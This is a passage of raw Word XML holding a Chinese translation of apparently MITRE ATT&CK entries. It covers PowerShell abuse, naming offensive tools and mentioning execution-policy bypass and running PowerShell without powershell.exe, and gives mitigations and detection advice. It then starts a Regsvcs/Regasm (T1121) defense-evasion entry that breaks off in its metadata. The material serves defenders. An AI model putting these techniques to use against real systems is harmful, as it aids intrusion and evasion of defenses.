    <w:p w14:paraId="57E1E67C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到远程系统需要管理员权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054049B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有许多基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的攻击性测试工具，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PSAttack</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024174D2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，而无需通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（公共语言界面）公开的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>底层</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.Management.Automation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序集的接口直接调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B4CD8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="52B52AD1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2C2FC8EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="403BD708" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="386A12A5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B3876C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1030BA5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行策略设置为仅执行签名的脚本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="005CE03C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="585A18C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1374BBFF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以在不需要时从系统中删除</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，但应执行审查以评估对环境的影响，因为它可能用于许多合法目的和管理功能。禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务来防止使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行远程执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="69D4F2CD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061312ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C9B943" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，请将</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行策略限制为管理员。请注意，有一些方法可以绕过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行策略，具体取决于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>环境配置。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2973839E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8D1E29" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAFBF5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果设置了正确的执行策略，攻击者可能会通过注册表或命令行获得管理员或系统访问权限，从而定义自己的执行策略。可以通过查看系统上的策略是否更改来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用。如果环境中本来没有使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则只需查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行就可能检测到恶意活动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D30E9E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定程序集（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>System.Management.Automation.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）关联项的加载和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或执行（尤其是异常进程名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68892A96" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志功能来提高执行过程中发生内容（适用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用）的保真度也是有益的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell 5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入了增强的日志功能，其中一些功能特性早已在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell 4.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。早期版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有很多日志功能。组织可以在数据分析平台中收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行细节，以补充其他数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133B220" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regsvcs/Regasm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2FBD85ED" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67457C92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1121</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC8CC1F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054BAE5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="436CC4E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC9D430" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FDE1738" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662D9AC1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E96CF07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Casey Smith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A91357A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
